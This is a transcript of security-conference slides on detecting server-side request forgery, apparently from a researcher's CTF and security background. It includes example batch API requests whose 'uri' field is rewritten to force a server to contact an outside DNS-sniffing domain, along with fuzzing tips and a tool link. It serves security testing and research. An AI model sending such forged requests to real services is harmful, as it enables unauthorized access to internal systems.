Presentation is loading. Please wait.

Presentation is loading. Please wait.

Fast (and almost automatic) SSRF detection Eldar Zaitov.

Published byEustace King Modified over 9 years ago

Similar presentations

Presentation on theme: "Fast (and almost automatic) SSRF detection Eldar Zaitov."— Presentation transcript:

1 Fast (and almost automatic) SSRF detection Eldar Zaitov

2 Fast (and almost automatic) SSRF detection Whoami Yandex More Smoked Leet Chicken CTF team CTFtime.org

3 Fast (and almost automatic) SSRF detection Server Side Request Forgery

4 Fast (and almost automatic) SSRF detection SSRF sources XXE and variations Declared functionality Errors in URL generation

5 Fast (and almost automatic) SSRF detection POST /ws/mail/v2.0/jsonrpc Content-Type: application/json { "method":"GetUserData", "params":[ {"includeUnverifiedExtAcct":true} ] } http://internal.host.com/ws/mail/v2.0/jsonrpc

6 Fast (and almost automatic) SSRF detection POST /ws/v3/batch HTTP/1.1 Content-Type: application/json { "requests": [ { "method":"POST", "uri":"/ws/mail/v2.0/jsonrpc", "payload": { "method":"GetUserData", "params":[{"includeUnverifiedExtAcct":true}]} } ] } http://internal.host.com/ws/mail/v2.0/jsonrpc

7 Fast (and almost automatic) SSRF detection Detection Output / Error based Backconnect DNS

8 Fast (and almost automatic) SSRF detection POST /ws/v3/batch HTTP/1.1 Content-Type: application/json { "requests": [ { "method":"POST", "uri":“.zndemo.kyprizel.net/", "payload": { "method":"GetUserData", "params":[{"includeUnverifiedExtAcct":true}]} } ] } http://internal.host.zndemo.kyprizel.net/

9 Fast (and almost automatic) SSRF detection http://some.internal.domain.and.host.com.zndemo.kyprizel.net/

10 Fast (and almost automatic) SSRF detection Detection / DNS snifferINA37.9.65.78 zndemoINNSsniffer.kyprizel.net

11 Fast (and almost automatic) SSRF detection Fuzzing Request parameters, headers Request body: multipart/formdata XML application/json whatever

12 Fast (and almost automatic) SSRF detection Detection / tools Burp suite plugin Fuzzer DNS server (optional) https://github.com/kyprizel/ussrfuzzer

13 @kyprizel

Download ppt "Fast (and almost automatic) SSRF detection Eldar Zaitov."

Similar presentations

SOAP SOAP is a protocol for accessing a Web Service. SOAP stands for Simple Object Access Protocol * SOAP is a communication protocol * SOAP is for communication.

SOAP SOAP is a protocol for accessing a Web Service. SOAP stands for Simple Object Access Protocol * SOAP is a communication protocol * SOAP is for communication.
© 2008 MindTree Consulting© 2010 MindTree Limited CONFIDENTIAL: For limited circulation only Going Open Source in Performance Testing July 2010.

© 2008 MindTree Consulting© 2010 MindTree Limited CONFIDENTIAL: For limited circulation only Going Open Source in Performance Testing July 2010.
Automating Bespoke Attack Ruei-Jiun Chapter 13. Outline Uses of bespoke automation ◦ Enumerating identifiers ◦ Harvesting data ◦ Web application fuzzing.

Automating Bespoke Attack Ruei-Jiun Chapter 13. Outline Uses of bespoke automation ◦ Enumerating identifiers ◦ Harvesting data ◦ Web application fuzzing.
Browsers and Servers CGI Processing Model ( Common Gateway Interface ) © Norman White, 2013.

Browsers and Servers CGI Processing Model ( Common Gateway Interface ) © Norman White, 2013.
Some HTTP Examples. A utility which shows all data from incoming requests is here: It is.

Some HTTP Examples. A utility which shows all data from incoming requests is here: It is.
A simple PHP application We are going to develop a simple PHP application with a Web interface. The user enters two numbers and the application returns.

A simple PHP application We are going to develop a simple PHP application with a Web interface. The user enters two numbers and the application returns.
1 HTTP and some other odds and ends Nelson Padua-Perez Bill Pugh Department of Computer Science University of Maryland, College Park.

1 HTTP and some other odds and ends Nelson Padua-Perez Bill Pugh Department of Computer Science University of Maryland, College Park.
CSC 450/550 Part 6: The Application Layer Example: The World Wide Web.

CSC 450/550 Part 6: The Application Layer Example: The World Wide Web.
CS320 Web and Internet Programming Generating HTTP Responses

CS320 Web and Internet Programming Generating HTTP Responses
1 The World Wide Web Architectural Overview Static Web Documents Dynamic Web Documents HTTP – The HyperText Transfer Protocol Performance Enhancements.

1 The World Wide Web Architectural Overview Static Web Documents Dynamic Web Documents HTTP – The HyperText Transfer Protocol Performance Enhancements.
! { action: { type: http, request: { uri: http://my.cloudapp.net:8000/ItemService/GetTweets, method: GET,

! { "action": { "type": "http", "request": { "uri": " "method": "GET",
ASHIMA KALRA.  INTRODUCTION TO JSP INTRODUCTION TO JSP  IMPLICIT OBJECTS IMPLICIT OBJECTS  COOKIES COOKIES.

ASHIMA KALRA.  INTRODUCTION TO JSP INTRODUCTION TO JSP  IMPLICIT OBJECTS IMPLICIT OBJECTS  COOKIES COOKIES.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner. Acunetix Web Vulnerability Scanner V9.

Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner. Acunetix Web Vulnerability Scanner V9.
Copyright © 2005 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.

PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
European Space Astronomy Centre (ESAC) Villafranca del Castillo, MADRID (SPAIN) Aurélien Stébé Homogeneous Access to Tabular Data Beijing, China - May.

European Space Astronomy Centre (ESAC) Villafranca del Castillo, MADRID (SPAIN) Aurélien Stébé Homogeneous Access to Tabular Data Beijing, China - May.
Web Services Overview Ashraf Memon. 2 Overview Service Oriented Architecture Web service overview Benefits of Web services Core technologies: XML, SOAP,

Web Services Overview Ashraf Memon. 2 Overview Service Oriented Architecture Web service overview Benefits of Web services Core technologies: XML, SOAP,
Www.seriousandroiddeveloper.in. Google Cloud Messaging for Android (GCM) is a free service that helps developers send data from servers to their Android.

Google Cloud Messaging for Android (GCM) is a free service that helps developers send data from servers to their Android.

Similar presentations

Ads by Google